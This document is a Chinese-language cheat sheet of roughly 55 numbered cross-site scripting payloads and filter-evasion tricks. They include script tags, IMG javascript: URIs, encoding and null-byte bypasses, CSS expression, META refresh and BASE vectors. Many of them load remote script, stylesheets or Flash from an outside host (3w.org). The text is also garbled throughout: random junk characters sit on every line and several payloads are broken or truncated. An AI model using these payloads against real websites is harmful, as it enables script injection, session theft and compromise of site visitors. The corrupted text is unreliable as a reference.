(1)普通的XSS JavaScript注入) l, u N- M& ?7 L6 W- D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 d& _: H5 R& G' J- c% ]0 s4 `- m- i, W6 L(99)另类弹框
% B9 n" H3 E; \* s<q/oncut=alert()>1; F3 t+ f- Y# ]' A s
<s/onclick=alert()>b
' A( j) k5 e0 f* e. | <XSS=" onclick="alert(1)//">clickme</SSX=">
7 D8 [+ m8 k5 |( ^" y% s. \+ @ <zzz onclick=alert`1`>clickme</zzz>
- \# O/ d3 w; I1 y b <a onclick=alert`1`>clickme</a>
) {3 f3 q; f; K. p# e2 a<a=">clickme</a=">0 o. f k: l9 D/ \' h
<a=">clickme</a>
, n0 s& `: y' K B* `; F6 D& i<z=">clickme</z=">9 Z& A _& D" ~" S$ M
<z onclick=alert`1`>clickme</z>' u/ j7 x. {3 q z+ O
4 g; }) G8 r! r, @' V0 @
(2)IMG标签XSS使用JavaScript命令
6 ]' i, ?8 R D" [<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% g- q7 n0 h8 c; R
+ t8 S1 T( t/ D0 c(3)IMG标签无分号无引号6 P; V9 L6 I: Z* S
<IMG SRC=javascript:alert(‘XSS’)>7 X( w- g* e. ] N/ y$ y
! ?/ f5 O$ N: z' D/ h& T(4)IMG标签大小写不敏感
; K4 ?3 _- J! n, y; |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 L! |' [. z- K& l! ]
2 \# _% _ e2 \6 @5 m8 U: ^0 O(5)HTML编码(必须有分号)- r( t) Y' ] Q# \: `; @0 P
<IMG SRC=javascript:alert(“XSS”)> h' [: _8 n+ G1 i
. U1 @- L; g. d6 ?2 h7 I: n; k, P8 I
(6)修正缺陷IMG标签( p: i( N9 E" ~+ }% k
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- |" |9 j4 k6 s: g" J
& K; F( R7 ^- t6 F* C0 o( ~
(7)formCharCode标签(计算器)
R2 t+ `8 F" B% _! K<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. x S+ ?! N/ L' \( q+ R
- P. `% |# Q6 P7 F* f(8)UTF-8的Unicode编码(计算器)
# @; _) B2 \: i! T7 _$ H<IMG SRC=jav..省略..S')>
: Y/ O, U9 O E3 d3 z N: y! H2 U/ D" r% p/ F
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
V. y% `1 }' a' T1 X<IMG SRC=jav..省略..S')>4 h$ C1 c: f- \( b+ }7 S) Z
5 ~( C+ ~7 I- F9 p S3 G(10)十六进制编码也是没有分号(计算器)
" ^7 O/ q" I" V3 F<IMG SRC=\'#\'" /span>
: o& L7 L# _ n# H2 D8 @: j, t4 G5 ^ w+ c8 N; w
(11)嵌入式标签,将Javascript分开
' }" U0 A2 H& c) Z' N* ~<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
! T! [: d# W' ~. }" r( k9 d- U2 y }; e' R
(12)嵌入式编码标签,将Javascript分开3 q' o. `" s5 Y3 L. Z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 }- z0 R9 K7 m1 c
# C2 V6 e* Z7 b# L( p- |8 Z% d+ G% K(13)嵌入式换行符& E3 d( v# {6 `$ g
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 s* k# z8 P8 v* j
9 @& q" m5 I& {, b8 A" \9 {(14)嵌入式回车
5 [/ i; _9 w( k; J% M. C8 q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 V. S" A9 F( @6 x7 ]7 M9 k
0 [0 \9 q1 N, o$ T(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) W8 I! A7 W6 z! M% x4 m8 L<IMG SRC=\'#\'" /span>& j/ i# G t/ U0 e d0 i6 I
* ?: t6 _. N" J
(16)解决限制字符(要求同页面)
! I6 q; r" S0 ~" v0 S5 B<script>z=’document.’</script>
( i' ^' U) G) o* \( @<script>z=z+’write(“‘</script>
, o; i! g& O/ r6 {' k% G<script>z=z+’<script’</script>
: u5 A* x- [0 [2 p, Z' d<script>z=z+’ src=ht’</script>$ P$ S6 U/ Z& J+ h. N( k8 I
<script>z=z+’tp://ww’</script>
- R" F$ q3 R. [4 O0 }! D/ R<script>z=z+’w.shell’</script>0 B# ^8 ~: B8 j" G
<script>z=z+’.net/1.’</script>. M. O! Q% `- I: U2 R
<script>z=z+’js></sc’</script>
; s! ]3 R: \& E' F<script>z=z+’ript>”)’</script>7 u d8 n- U0 Y
<script>eval_r(z)</script>/ k- s% Z0 ?9 C. `, b% y3 O0 }" K
w Q8 M! Y5 f) v
(17)空字符
- f, w; Z0 [4 Y) Operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, Q: r+ s7 ]5 F" z. w
& w/ A. E. @$ x7 e( ^3 o3 I' ]) @(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用2 O$ S8 e# |! x( c- |, J
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( h) r5 f! o0 w4 o9 B" C2 q$ n2 A; @& B# X
(19)Spaces和meta前的IMG标签
# A( N$ }8 ?( S# R6 V<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
9 K$ e0 B4 D6 ]' g( `. K/ i% k1 b) _/ T- L2 [. O J# u1 i
(20)Non-alpha-non-digit XSS! G. T+ v( M, I% G( D% \; ?, {, K
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>9 v/ f* t; W2 U$ q+ D+ o; B
. `: I/ a9 T9 ^(21)Non-alpha-non-digit XSS to 2
|0 ?( N1 F$ @/ F& C* ^+ A<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% ~7 U& I6 R9 F5 k, Y+ d: l: n9 V# l/ R. |6 Z+ ^9 ?
(22)Non-alpha-non-digit XSS to 3
& ?: O# F5 v5 [$ N0 a, J4 m<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>$ o! f" c6 Y/ R. x1 }$ `' E) n
/ H/ y( c/ n' j/ O6 l
(23)双开括号
# _' u6 l: T7 Q6 _7 G$ B9 ~) ?<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. r$ B; [/ p- v& p z4 W) k) C/ d0 w2 E6 }+ I" t$ A: F4 H1 c$ s0 _
(24)无结束脚本标记(仅火狐等浏览器)
( T4 P: L) H) B# j<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 d, {8 L* v" N. E
- @, a7 h& R1 ?9 q5 P8 Q+ s! i
(25)无结束脚本标记2
( N5 Z: m: r) v3 A( l. N' I1 @2 H" F) D<SCRIPT SRC=//3w.org/XSS/xss.js>7 ~9 E% {# d7 ^) x' n
4 c- @: j7 N8 X/ C(26)半开的HTML/JavaScript XSS
# e, G+ M) v$ e8 O+ J<IMG SRC=\'#\'" /span>
6 _1 M9 b8 q0 R" F) D. A
/ W* ~+ Y. S6 @(27)双开角括号
5 g- ~2 |" W9 M! }4 f7 m<iframe src=http://3w.org/XSS.html <* y3 {, g; e$ B9 |' U2 W6 Z- E" Z
. i% k) n+ E& U, l, Z7 B
(28)无单引号 双引号 分号) L6 c; Q: E, c
<SCRIPT>a=/XSS/3 x$ i2 x% d3 ^2 t+ F5 E4 ~
alert(a.source)</SCRIPT>
2 e; N7 F4 ^, f; x
4 A8 y4 F A* K& l3 }- |(29)换码过滤的JavaScript6 d* v5 q& m, O" ?' ~% V4 X% e
\”;alert(‘XSS’);//
2 ^! f! G8 l1 m* c, f, h0 k2 U3 m) P" {) F/ {. n% f' E+ u- k
(30)结束Title标签
5 y1 i7 |; |0 s1 \9 b</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 C9 l# ^' k1 b1 z& E5 J t
, ]7 k& V7 B* ]/ r! |; M8 x# j(31)Input Image6 [2 u* q, M; K* c7 x2 d& f
<INPUT SRC=\'#\'" /span>: I* m2 s! R/ T. U
( h# X7 U6 { @- A. O/ g* a6 N
(32)BODY Image
; s, ]9 W' E# ?& @9 }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 r& t3 h: I+ G0 {) j1 c
9 W- E+ u* V6 i, _
(33)BODY标签
* l# c2 D" t, F2 o. }/ x, R<BODY(‘XSS’)>4 r- T% G# N- q9 [6 \7 z8 A7 B$ A0 M
8 g- X1 F& ?6 ?3 u
(34)IMG Dynsrc
# Q% h1 f0 M/ J/ U4 @<IMG DYNSRC=\'#\'" /span>2 x% @8 Y1 O, \+ I4 H: b) I# W
+ M- X6 |8 u' b5 \* \9 k9 I(35)IMG Lowsrc
4 Z- |) O1 ]! ?6 E<IMG LOWSRC=\'#\'" /span>6 }6 Z' A: f; t( r& }5 P
- d& b- q& W5 w+ g1 K+ |
(36)BGSOUND
% a+ a9 @4 |) x/ Z {* M3 v7 n8 [<BGSOUND SRC=\'#\'" /span>
2 c# L) Y2 {) n9 T" i4 C. S/ C8 g" t z! r6 c# q$ l
(37)STYLE sheet3 P' v1 r2 n" [# s4 w
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- ]8 b" w5 W$ Z1 m; s
, w( f+ [5 D" |; x0 F* z1 D
(38)远程样式表
4 W4 I1 S0 E: A0 p2 A/ a& J; u<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! q }; N! J& u; }: ]9 W7 B
' `! u2 e: I5 B3 Y! \6 o
(39)List-style-image(列表式)
! T p7 w- P) d<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- a8 j, S5 {9 C$ t1 q7 k& V7 ~0 Y6 M5 O4 _, a. L" |
(40)IMG VBscript, C7 }# f& g& P5 Z2 K! L
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS0 {2 }& i0 g+ t! U
* k! o5 _0 e% j0 [6 {2 H9 A$ l' B8 L5 i
(41)META链接url
1 I6 O8 L ]& Q9 a<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& N) M6 M! r( L* n$ l5 \
& K d# }/ x0 {* I$ n- y3 [(42)Iframe" ~8 |9 ^) J# `% v7 r$ j0 q$ F
<IFRAME SRC=\'#\'" /IFRAME>
% \$ M7 f, h3 @9 O; Z
+ M( D( G* f7 n: D/ O( y9 q(43)Frame/ b, m$ h) o0 f7 i, N3 x# o
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
& Q; |! b- t) s7 S( A) F5 J5 r5 J* `
(44)Table# w6 D! I1 J4 o% q8 \; r
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> y# h6 Q8 u6 o7 {' M
7 H7 A k' J" P$ D5 u. @6 q
(45)TD
0 w- {. k) W' |8 ~* _<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 s- |# E, A! v/ Z5 a
' P1 ]# Q% k' r0 B(46)DIV background-image
5 w* Z" S- F. Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" N, |* g( Y1 H5 h" D- e; R7 D
* x+ c2 m# x% w, `! ?" ?(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 x8 d; R+ _( F0 y9 Q, W5 L<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 C6 D$ g3 v( R3 J6 I2 A( ~/ t
^. \, W2 I E. _- c4 k
(48)DIV expression
, Q1 \( @- c$ h( t+ E4 s<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 t& Y b: o9 z9 d
7 B' g: j. @* ^, G) ^3 j# |, g$ w
(49)STYLE属性分拆表达
* {) F5 Y1 I% P/ f2 ~/ R, _<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>- z$ E4 @ z0 }7 L+ ]
, m2 Q1 ~: H# a! R+ }
(50)匿名STYLE(组成:开角号和一个字母开头)
/ C8 u: M, Z# Q% X3 q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: z$ |4 Z3 e, K1 C8 y, Y: i: c
6 ]: A; v& l$ E+ n% t. f(51)STYLE background-image
# r9 w# q ^" \2 |2 N5 k# S6 \: r<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" g0 c- x) e, }6 X- o, A' w
' a# R7 L7 v2 Y% F1 _( ](52)IMG STYLE方式
8 v# O4 c! f* N' N$ |% M9 A: }) m- `exppression(alert(“XSS”))’>8 k' @: q3 y3 i& P( k& ]" A( n
" _$ ^. x& ^, p- r- P* q1 f(53)STYLE background
; |7 X! Y/ M2 S4 T! }<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 _: d3 [. ^/ E
& o; X6 d J; x" r
(54)BASE2 `- o# l5 Y5 u. T
<BASE HREF=”javascript:alert(‘XSS’);//”>
9 Q" O8 [' Z1 ]2 [$ b7 \* X( t% f' D4 t2 f
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: q# e! A0 v' M$ _! U3 j f
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>3 b# Y& f: i" y) {4 I; o
|